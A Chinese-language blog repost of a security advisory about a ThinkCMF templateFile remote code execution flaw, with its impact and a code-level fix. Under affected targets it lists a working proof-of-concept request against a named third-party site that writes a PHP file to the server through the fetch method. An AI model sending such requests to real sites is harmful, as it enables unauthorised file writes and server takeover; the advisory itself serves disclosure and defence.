ThinkCMF templateFile 远程代码执行漏洞

漏洞描述

2019年11月6日,阿里云应急响应中心监测到ThinkCMF templateFile 远程代码执行漏洞。攻击者通过构造特定的请求,成功利

用该漏洞可直接获取服务器权限。

漏洞造成的影响

由于ThinkCMF对某些函数的访问权限设置存在问题,攻击者在无需任何权限情况下可以通过构造恶意请求,向服务器写入任

意内容的文件,达到远程代码执行的目的。攻击者利用该漏洞可以直接获取到服务器权限,阿里云应急响应中心提醒

ThinkCMF用户尽快采取安全措施阻止漏洞攻击。

安全建议

  1. 请关注ThinkCMF官方以便获取更新信息:https://www.thinkcmf.com/
  2. 自行修改代码。将文件 HomebaseController.class.php 和 AdminbaseController.class.php 类中 display 和 fetch 函数的修饰符改

为 protected。

受影响目标

http://bodasirui.com/index.php?a=fetch&templateFile=public/index&prefix=&content=<php>file_put_contents("c4

ca4238a0b923820dcc509a6f75849b.php","c81e728d9d4c2f636f067f89cc14862c")</php>

本文固定链接: http://blog.wmphp.com/3387.html | 速光网络博客

该日志由 admin 于2020年11月21日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: ThinkCMF templateFile 远程代码执行漏洞 | 速光网络博客

ThinkCMF templateFile 远程代码执行漏洞:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter